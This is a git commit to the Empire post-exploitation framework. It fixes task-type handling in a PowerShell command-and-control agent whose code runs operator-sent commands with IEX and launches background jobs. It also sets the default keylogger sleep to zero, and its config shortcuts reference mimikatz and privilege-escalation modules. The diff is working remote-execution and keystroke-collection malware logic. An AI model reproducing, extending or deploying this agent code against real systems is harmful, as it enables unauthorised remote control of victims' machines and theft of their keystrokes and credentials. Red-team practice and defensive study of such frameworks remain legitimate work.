updated powershell agent to properly handle multiple tasking types (#504

)
BC-SECURITY · Dec 15, 2022 · 434270e · 434270e
1 parent ba4fb56
commit 434270e
Show file tree

Hide file tree

Showing 3 changed files with 10 additions and 10 deletions.
diff --git a/empire/client/config.yaml b/empire/client/config.yaml
@@ -48,7 +48,7 @@ shortcuts:
       module: powershell_collection_keylogger
       params:
         - name: Sleep
-          value: 1
+          value: 0
     sherlock:
       module: powershell_privesc_sherlock
     mimikatz:
@@ -125,7 +125,7 @@ shortcuts:
       module: powershell_collection_keylogger
       params:
         - name: Sleep
-          value: 1
+          value: 0
     sherlock:
       module: powershell_privesc_sherlock
     mimikatz:
@@ -187,7 +187,7 @@ shortcuts:
       module: powershell_collection_keylogger
       params:
         - name: Sleep
-          value: 1
+          value: 0
     sherlock:
       module: powershell_privesc_sherlock
     mimikatz:

diff --git a/empire/server/data/agent/agent.ps1 b/empire/server/data/agent/agent.ps1
@@ -1046,24 +1046,24 @@ function Invoke-Empire {
             }
 
             # socks proxy server
-            elseif($type -eq 34) {
+            elseif($type -eq 60) {
                 Encode-Packet -type 0 -data '[!] SOCKS server not implemented' -ResultID $ResultID;
             }
 
             # socks proxy server data
-            elseif($type -eq 34) {
+            elseif($type -eq 61) {
                 Encode-Packet -type 0 -data '[!] SOCKS server data not implemented' -ResultID $ResultID;
             }
 
             # dynamic code execution, wait for output, don't save output
-            elseif($type -eq 100 -or 118) {
+            elseif($type -eq 100 -or $type -eq 118) {
                 $ResultData = IEX $data;
                 if($ResultData) {
                     Encode-Packet -type $type -data $ResultData -ResultID $ResultID;
                 }
             }
             # dynamic code execution, wait for output, save output
-            elseif($type -eq 101 -or 119) {
+            elseif($type -eq 101 -or $type -eq 119) {
                 # format- [15 chars of prefix][5 chars extension][data]
                 $prefix = $data.Substring(0,15);
                 $extension = $data.Substring(15,5);
@@ -1074,13 +1074,13 @@ function Invoke-Empire {
             }
 
             # dynamic code execution, no wait, don't save output
-            elseif($type -eq 110 -or 112) {
+            elseif($type -eq 110 -or $type -eq 112) {
                 $jobID = Start-AgentJob $data;
                 $script:ResultIDs[$jobID]=$resultID;
                 Encode-Packet -type $type -data ("Job started: " + $jobID) -ResultID $ResultID;
             }
             # dynamic code execution, no wait, save output
-            elseif($type -eq 111 -or 113) {
+            elseif($type -eq 111 -or $type -eq 113) {
                 Encode-Packet -type 0 -data '[!] Dynamic code execution, no wait, save output not implemented' -ResultID $ResultID;
 
                 # Write-Host "'dynamic code execution, no wait, save output' not implemented!"

diff --git a/empire/server/modules/powershell/collection/keylogger.yaml b/empire/server/modules/powershell/collection/keylogger.yaml
@@ -31,6 +31,6 @@ options:
   - name: Sleep
     description: Sleep time [ms] between key presses. Shorter times may increase CPU usage on the target.
     required: false
-    value: '1'
+    value: '0'
 script_path: collection/Get-Keystrokes.ps1
 script_end: Get-Keystrokes {{ PARAMS }}